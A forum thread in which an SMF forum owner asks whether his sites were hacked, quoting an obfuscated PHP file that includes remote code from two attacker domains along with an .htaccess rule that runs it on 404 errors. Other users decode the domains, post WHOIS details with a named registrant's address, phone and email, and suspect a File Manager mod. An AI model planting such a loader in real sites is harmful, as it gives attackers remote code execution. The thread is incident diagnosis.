Has my SMF been hacked?

[SniffTheGlove]

I have also posted to http://www.simplemachines.org/community/index.php?topic=150202.0 in case that it is not TP related. Sorry

I think someone has hacked into various SMF forums I have.

I have noticed that rogue files made up of 5 numerals have apperared and comprise this code..

Code Select Expand


error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);}


Also the .htaccess file has been modifed to
Code:


Options -MultiViews
ErrorDocument 404 //frp/Themes/default/84248.php


I have not added any mods on the days these files were created? also these appear in multiple forums, one forum does not even have any mods though they all have TP.

They appear in every folder on my sites

Can any body shed any light what the php code does? and how they got placed in all my directories.

I do not believe that the host has been hacked as it is only the SMF forum sites that have been touched.

~Thanks

[Thurnok]

What the code is doing, is performing an include function (inserting code from a file or URL - in this case an URL as you can see below) and at the end of the include, it is listing various info about your server.  Most likely for marketing / spamming purposes.

The two includes in the code are basically this:

Code Select Expand


http://www3.phptags.ws/?<various gathered server info about your server>
and
http://shop.vmarket.info/?<various gathered server info about your server>


So, the two domains listed above are responsible.  Sounds like it is time to sign them up for their own spam. 

As for the .htaccess - looks like they have set it up to launch their code anytime someone would normally get a 404 error from your site (they type in an invalid URL on your domain for example)

So, the answer to you question is "Yes".  Someone hacked into your site in order to place that info there (php files, and modifying your .htaccess files)

[SniffTheGlove]

Thanks Thurnok,

OK, so I have to find out...

1) Was it from my Cpanel account (Asking host now via support ticket)
2) Was the Host server hacked (Asking host now via support ticket - No likely due only the SMF/TP forums were touched))
3) Was it a flaw in SMF 1.1.1 that gave them access to my site (Asking at SMF)
4) Was it a flaw in SMF 1.1.1/TP that gave them access to my site (Asking here)
5) Was it via FTP (Doubtful as all accounts have different username/password)
6) Done by the devil 

Thanks, I would also advise people to view their own sites via ftp to check their site as I only came across these when accessing via FTP to check the status of an uploaded CSV file I have running on a CRON job. So I have missed these files for over 2 weeks.

Thanks again

[akulion]

just checked in my directories nothing there which shouldnt be there

[Thurnok]

Some info on your perpetrator:

Domain ID:D14512147-LRMS
Domain Name:VMARKET.INFO
Created On:28-Aug-2006 11:22:00 UTC
Last Updated On:28-Oct-2006 02:28:25 UTC
Expiration Date:28-Aug-2007 11:22:00 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:OK
Registrant ID:DI_3794215
Registrant Name:Brad Yasinski
Registrant Organization:N/A
Registrant Street1:Krowoderskich 36/12
Registrant Street2:
Registrant Street3:
Registrant City:Tarnow
Registrant State/Province:
Registrant Postal Code:11220
Registrant Country:PL
Registrant Phone:+480.145214714
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:startinfo2005@yahoo.com
Name Server:NS1.VMARKET.INFO
Name Server:NS2.VMARKET.INFO

[SniffTheGlove]

Thanks again,

Some additional info. The same problem is discussed here http://www.jaguarpc.com/forums/showthread.php?t=13305

I don't use cubecart but suspect the same vulnerability in php/SMF was used.

[IchBin]

It doesn't have to be something from your account. If you're on a shared host account it could very well be that they executed the exploit from another account and it affected EVERYONE on the server you're on. I highly doubt it was SMF myself.

[SniffTheGlove]

I have a reply from the host, they say that the server was not compromised and there is one other account with SMF running and that was not effected by this hack, therefore their belief is that it happened via SMF.

I am still trying to located the raw log files but as I had them sent to delete every month it looks like I shall not get hold of them.

[IchBin]

IMO, I think they're feeding you a line of crap. Ask them for proof. They should have a log of all activity on the server. A good host will know how it happened and where they gained access. If you think its SMF then, please fill a security report out when you get a moment.
http://www.simplemachines.org/about/security.php

[Thurnok]

I believe I found the source of failure that allowed this hack.  Did you have the SMF File Manager mod installed Sniff?

I've done some checking, and tracked it down on another site and appears to have been due to that mod.  I also wrote a small cleanup for it.  I'll make that available here later... gotta go eat..